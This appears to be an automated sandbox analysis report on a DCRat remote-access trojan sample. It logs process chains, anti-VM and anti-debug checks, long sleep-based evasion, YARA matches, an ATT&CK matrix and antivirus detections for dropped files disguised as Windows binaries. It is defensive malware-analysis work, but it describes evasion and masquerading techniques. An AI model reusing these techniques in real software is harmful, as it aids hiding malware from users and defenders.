Source: C:\Recovery\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe	Process information set: NOOPENFILEERRORBOX

Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe	Memory allocated: AB0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe	Memory allocated: 1A6D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\Public\Desktop\spoolsv.exe	Memory allocated: 920000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\Public\Desktop\spoolsv.exe	Memory allocated: 1A7D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\Public\Desktop\spoolsv.exe	Memory allocated: 1890000 memory reserve \| memory write watch
Source: C:\Users\Public\Desktop\spoolsv.exe	Memory allocated: 1B450000 memory reserve \| memory write watch
Source: C:\Recovery\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe	Memory allocated: 10D0000 memory reserve \| memory write watch
Source: C:\Recovery\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe	Memory allocated: 1AB10000 memory reserve \| memory write watch
Source: C:\Recovery\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe	Memory allocated: 980000 memory reserve \| memory write watch
Source: C:\Recovery\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe	Memory allocated: 1A700000 memory reserve \| memory write watch

Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\Public\Desktop\spoolsv.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\Public\Desktop\spoolsv.exe	Thread delayed: delay time: 922337203685477
Source: C:\Recovery\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe	Thread delayed: delay time: 922337203685477
Source: C:\Recovery\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\SysWOW64\wscript.exe	Window found: window name: WSH-Timer			Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Window found: window name: WSH-Timer			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe	Window / User API: threadDelayed 525	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe	Window / User API: threadDelayed 1599	Jump to behavior
Source: C:\Users\Public\Desktop\spoolsv.exe	Window / User API: threadDelayed 367
Source: C:\Recovery\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe	Window / User API: threadDelayed 365
Source: C:\Recovery\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe	Window / User API: threadDelayed 367

Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe TID: 6348	Thread sleep count: 525 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe TID: 5512	Thread sleep count: 1599 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe TID: 6552	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\Public\Desktop\spoolsv.exe TID: 2300	Thread sleep count: 269 > 30	Jump to behavior
Source: C:\Users\Public\Desktop\spoolsv.exe TID: 2300	Thread sleep count: 139 > 30	Jump to behavior
Source: C:\Users\Public\Desktop\spoolsv.exe TID: 5144	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\Public\Desktop\spoolsv.exe TID: 5560	Thread sleep count: 367 > 30
Source: C:\Users\Public\Desktop\spoolsv.exe TID: 5636	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Recovery\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe TID: 4012	Thread sleep count: 365 > 30
Source: C:\Recovery\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe TID: 6400	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Recovery\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe TID: 6536	Thread sleep count: 367 > 30
Source: C:\Recovery\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe TID: 5564	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\Public\Desktop\spoolsv.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\Public\Desktop\spoolsv.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Recovery\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Recovery\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe	File Volume queried: C:\ FullSizeInformation

Source: C:\Users\user\Desktop\5U9CuGu1ru.exe	Code function: 0_2_0080A5F4 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,	0_2_0080A5F4
Source: C:\Users\user\Desktop\5U9CuGu1ru.exe	Code function: 0_2_0081B8E0 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,	0_2_0081B8E0
Source: C:\Users\user\Desktop\5U9CuGu1ru.exe	Code function: 0_2_0082AAA8 FindFirstFileExA,	0_2_0082AAA8

Source: C:\Users\user\Desktop\5U9CuGu1ru.exe

Code function: 0_2_0081DD72 VirtualQuery,GetSystemInfo,

0_2_0081DD72

Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\Public\Desktop\spoolsv.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\Public\Desktop\spoolsv.exe	Thread delayed: delay time: 922337203685477
Source: C:\Recovery\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe	Thread delayed: delay time: 922337203685477
Source: C:\Recovery\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe	File opened: C:\Users\user\Documents\desktop.ini	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe	File opened: C:\Users\user\AppData\Local\Temp	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe	File opened: C:\Users\user\AppData\Local	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe	File opened: C:\Users\user\Desktop\desktop.ini	Jump to behavior

Source: 5U9CuGu1ru.exe, 00000000.00000002.2054403439.0000000003472000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\y
Source: wscript.exe, 00000002.00000003.2137616008.0000000002EC7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: containerdll.exe, 00000006.00000002.2189554386.00000000006B2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Bc
Source: 5U9CuGu1ru.exe, 00000000.00000003.2050948775.0000000003472000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}y
Source: containerdll.exe, 00000006.00000002.2214167669.000000001B679000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}uint32M

Source: C:\Users\user\Desktop\5U9CuGu1ru.exe

API call chain: ExitProcess graph end node

graph_0-23710

Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\5U9CuGu1ru.exe

Code function: 0_2_0082866F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_0082866F

Source: C:\Users\user\Desktop\5U9CuGu1ru.exe

Code function: 0_2_0082753D mov eax, dword ptr fs:[00000030h]

0_2_0082753D

Source: C:\Users\user\Desktop\5U9CuGu1ru.exe

Code function: 0_2_0082B710 GetProcessHeap,

0_2_0082B710

Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\Public\Desktop\spoolsv.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\Public\Desktop\spoolsv.exe	Process token adjusted: Debug
Source: C:\Recovery\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe	Process token adjusted: Debug
Source: C:\Recovery\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\5U9CuGu1ru.exe	Code function: 0_2_0081F063 SetUnhandledExceptionFilter,	0_2_0081F063
Source: C:\Users\user\Desktop\5U9CuGu1ru.exe	Code function: 0_2_0081F22B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_0081F22B
Source: C:\Users\user\Desktop\5U9CuGu1ru.exe	Code function: 0_2_0082866F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_0082866F
Source: C:\Users\user\Desktop\5U9CuGu1ru.exe	Code function: 0_2_0081EF05 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_0081EF05

Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Users\user\Desktop\5U9CuGu1ru.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Intodhcp\k6u1xEDPWjfrPQve79LV.vbe"	Jump to behavior
Source: C:\Users\user\Desktop\5U9CuGu1ru.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Intodhcp\file.vbs"	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\Intodhcp\zSeea0nqF8D7gTEAJAxS8lBZw.bat" "	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe "C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe	Process created: unknown unknown	Jump to behavior

Source: C:\Users\user\Desktop\5U9CuGu1ru.exe

Code function: 0_2_0081ED5B cpuid

0_2_0081ED5B

Source: C:\Users\user\Desktop\5U9CuGu1ru.exe

Code function: GetLocaleInfoW,GetNumberFormatW,

0_2_0081A63C

Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\Public\Desktop\spoolsv.exe	Queries volume information: C:\Users\Public\Desktop\spoolsv.exe VolumeInformation	Jump to behavior
Source: C:\Users\Public\Desktop\spoolsv.exe	Queries volume information: C:\Users\Public\Desktop\spoolsv.exe VolumeInformation
Source: C:\Recovery\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe	Queries volume information: C:\Recovery\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe VolumeInformation
Source: C:\Recovery\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe	Queries volume information: C:\Recovery\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe VolumeInformation

Source: C:\Users\user\Desktop\5U9CuGu1ru.exe

Code function: 0_2_0081D5D4 GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,

0_2_0081D5D4

Source: C:\Users\user\Desktop\5U9CuGu1ru.exe

Code function: 0_2_0080ACF5 GetVersionExW,

0_2_0080ACF5

Source: C:\Windows\SysWOW64\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected DCRat

Source: Yara match	File source: 00000006.00000002.2190779031.00000000027D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.2270353647.0000000003451000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2190779031.00000000026D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.2269260398.0000000002701000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.2270383739.00000000027D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.2270348613.0000000002B11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2194931311.00000000126DF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: containerdll.exe PID: 748, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: spoolsv.exe PID: 6416, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: spoolsv.exe PID: 1292, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: WHqeodkmYpJedFVKZpNEincEtJvAcD.exe PID: 940, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: WHqeodkmYpJedFVKZpNEincEtJvAcD.exe PID: 2140, type: MEMORYSTR

Remote Access Functionality

Yara detected DCRat

Source: Yara match	File source: 00000006.00000002.2190779031.00000000027D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.2270353647.0000000003451000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2190779031.00000000026D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.2269260398.0000000002701000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.2270383739.00000000027D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.2270348613.0000000002B11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2194931311.00000000126DF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: containerdll.exe PID: 748, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: spoolsv.exe PID: 6416, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: spoolsv.exe PID: 1292, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: WHqeodkmYpJedFVKZpNEincEtJvAcD.exe PID: 940, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: WHqeodkmYpJedFVKZpNEincEtJvAcD.exe PID: 2140, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	12 Scripting	Valid Accounts	11 Windows Management Instrumentation	1 Scheduled Task/Job	11 Process Injection	123 Masquerading	OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	2 Command and Scripting Interpreter	12 Scripting	1 Scheduled Task/Job	1 Disable or Modify Tools	LSASS Memory	121 Security Software Discovery	Remote Desktop Protocol	Data from Removable Media	Junk Data	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Scheduled Task/Job	31 Registry Run Keys / Startup Folder	31 Registry Run Keys / Startup Folder	31 Virtualization/Sandbox Evasion	Security Account Manager	1 Process Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	Steganography	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	1 DLL Side-Loading	1 DLL Side-Loading	11 Process Injection	NTDS	31 Virtualization/Sandbox Evasion	Distributed Component Object Model	Input Capture	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Deobfuscate/Decode Files or Information	LSA Secrets	1 Application Window Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	2 Obfuscated Files or Information	Cached Domain Credentials	3 File and Directory Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Software Packing	DCSync	37 System Information Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label
5U9CuGu1ru.exe	64%	ReversingLabs	ByteCode-MSIL.Trojan.Uztuby
5U9CuGu1ru.exe	100%	Avira	VBS/Runner.VPG
5U9CuGu1ru.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Recovery\ShellExperienceHost.exe	100%	Avira	HEUR/AGEN.1323984
C:\Program Files (x86)\Windows Multimedia Platform\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe	100%	Avira	HEUR/AGEN.1323984
C:\Program Files (x86)\Windows Multimedia Platform\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe	100%	Avira	HEUR/AGEN.1323984
C:\Users\Default\Documents\WmiPrvSE.exe	100%	Avira	HEUR/AGEN.1323984
C:\Program Files (x86)\Windows Multimedia Platform\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe	100%	Avira	HEUR/AGEN.1323984
C:\Program Files (x86)\Windows Multimedia Platform\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe	100%	Avira	HEUR/AGEN.1323984
C:\Users\Public\Desktop\spoolsv.exe	100%	Avira	HEUR/AGEN.1323984
C:\Recovery\RuntimeBroker.exe	100%	Avira	HEUR/AGEN.1323984
C:\Users\user\AppData\Local\Temp\kVQjSoqMfO.bat	100%	Avira	BAT/Delbat.C
C:\Program Files (x86)\Windows Multimedia Platform\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe	100%	Avira	HEUR/AGEN.1323984
C:\Program Files (x86)\Windows Multimedia Platform\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe	100%	Avira	HEUR/AGEN.1323984
C:\Program Files (x86)\Windows Multimedia Platform\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe	100%	Avira	HEUR/AGEN.1323984
C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe	100%	Avira	HEUR/AGEN.1323984
C:\Program Files (x86)\Windows Multimedia Platform\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe	100%	Avira	HEUR/AGEN.1323984
C:\Program Files\Windows Defender Advanced Threat Protection\Memory Compression.exe	100%	Avira	HEUR/AGEN.1323984
C:\Program Files\Google\Chrome\Application\SetupMetrics\sihost.exe	100%	Avira	HEUR/AGEN.1323984
C:\Users\user\AppData\Local\Temp\Intodhcp\k6u1xEDPWjfrPQve79LV.vbe	100%	Avira	VBS/Runner.VPG
C:\Recovery\ShellExperienceHost.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Windows Multimedia Platform\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Windows Multimedia Platform\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe	100%	Joe Sandbox ML
C:\Users\Default\Documents\WmiPrvSE.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Windows Multimedia Platform\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Windows Multimedia Platform\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe	100%	Joe Sandbox ML
C:\Users\Public\Desktop\spoolsv.exe	100%	Joe Sandbox ML
C:\Recovery\RuntimeBroker.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Windows Multimedia Platform\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Windows Multimedia Platform\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Windows Multimedia Platform\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Windows Multimedia Platform\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe	100%	Joe Sandbox ML
C:\Program Files\Windows Defender Advanced Threat Protection\Memory Compression.exe	100%	Joe Sandbox ML
C:\Program Files\Google\Chrome\Application\SetupMetrics\sihost.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Windows Multimedia Platform\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe	82%	ReversingLabs	ByteCode-MSIL.Ransomware.Prometheus
C:\Program Files (x86)\Windows Portable Devices\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe	82%	ReversingLabs	ByteCode-MSIL.Ransomware.Prometheus
C:\Program Files\Google\Chrome\Application\SetupMetrics\sihost.exe	82%	ReversingLabs	ByteCode-MSIL.Ransomware.Prometheus
C:\Program Files\Windows Defender Advanced Threat Protection\Memory Compression.exe	82%	ReversingLabs	ByteCode-MSIL.Ransomware.Prometheus
C:\Program Files\Windows Mail\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe	82%	ReversingLabs	ByteCode-MSIL.Ransomware.Prometheus
C:\Program Files\Windows NT\TableTextService\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe	82%	ReversingLabs	ByteCode-MSIL.Ransomware.Prometheus
C:\Recovery\RuntimeBroker.exe	82%	ReversingLabs	ByteCode-MSIL.Ransomware.Prometheus
C:\Recovery\ShellExperienceHost.exe	82%	ReversingLabs	ByteCode-MSIL.Ransomware.Prometheus
C:\Recovery\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe	82%	ReversingLabs	ByteCode-MSIL.Ransomware.Prometheus
C:\Users\Default\Documents\WmiPrvSE.exe	82%	ReversingLabs	ByteCode-MSIL.Ransomware.Prometheus
C:\Users\Public\Desktop\spoolsv.exe	82%	ReversingLabs	ByteCode-MSIL.Ransomware.Prometheus
C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe	82%	ReversingLabs	ByteCode-MSIL.Ransomware.Prometheus
C:\Windows\Downloaded Program Files\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe	82%	ReversingLabs	ByteCode-MSIL.Ransomware.Prometheus
C:\Windows\Logs\SettingSync\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe	82%	ReversingLabs	ByteCode-MSIL.Ransomware.Prometheus
C:\Windows\Temp\Crashpad\reports\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe	82%	ReversingLabs	ByteCode-MSIL.Ransomware.Prometheus

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

⊘No contacted domains info

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
